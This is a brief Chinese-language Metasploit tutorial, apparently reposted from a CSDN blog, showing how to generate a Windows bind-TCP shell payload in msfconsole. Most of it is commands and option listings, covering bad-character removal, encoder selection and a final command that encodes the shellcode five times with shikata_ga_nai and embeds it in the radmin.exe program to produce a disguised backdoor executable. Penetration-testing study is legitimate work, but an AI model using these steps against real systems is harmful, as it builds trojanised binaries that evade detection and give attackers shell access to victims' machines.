作用

运行shell的脚本

使用方法

  1. msfconsole
  2. msf > show payloads #查看可用payload
  3. msf > use payload/windows/shell_bind_tcp #这是个绑定端口shell
  4. msf payload(windows/shell/bind_tcp) > show options #查看设置
  5. msf payload(windows/shell/bind_tcp) > generate #获得shellcode,是ruby语言写的
  6. msf payload(windows/shell/bind_tcp) > generate -h
  7. Usage: generate [options]
  8. Generates a payload.
  9. OPTIONS:
  10. -E 强制编码。
  11. -b <opt> 要避免的字符列表:'\ x00 \ xff'
  12. -e <opt> 要使用的编码器模块的名称。
  13. -f <opt> 输出文件名(否则为stdout
  14. -h 帮助横幅。
  15. -i <opt> 编码迭代的次数。
  16. -k 保持模板可执行的功能
  17. -o <opt> VAR = VAL格式逗号分隔的选项列表。
  18. -p <opt> 输出平台
  19. -s <opt> NOP sled length.
  20. -t <opt> 输出格式: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war
  21. -x <opt> 要使用的可执行模板
  22. #绕过坏字符
  23. msf payload(windows/shell/bind_tcp) > generate -b '\x00'
  24. msf payload(windows/shell/bind_tcp) > generate -b '\x00\x44\x67\x66\xfa\x01\xe0\x44\x67\xa1\xa2\xa3\x75\x4b' #generate会自动选择最合适的
  25. #如果要排除的坏字符太多,可能就没有合适的shellcode了
  26. #手动指定编码模块
  27. msf payload(windows/shell/bind_tcp) > show encoders
  28. #注入文件
  29. msf payload(windows/shell/bind_tcp) > generate -b '\x00' -t exe -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f /root/1.exe
  30. 原文:https://fishpond.blog.csdn.net/article/details/105788369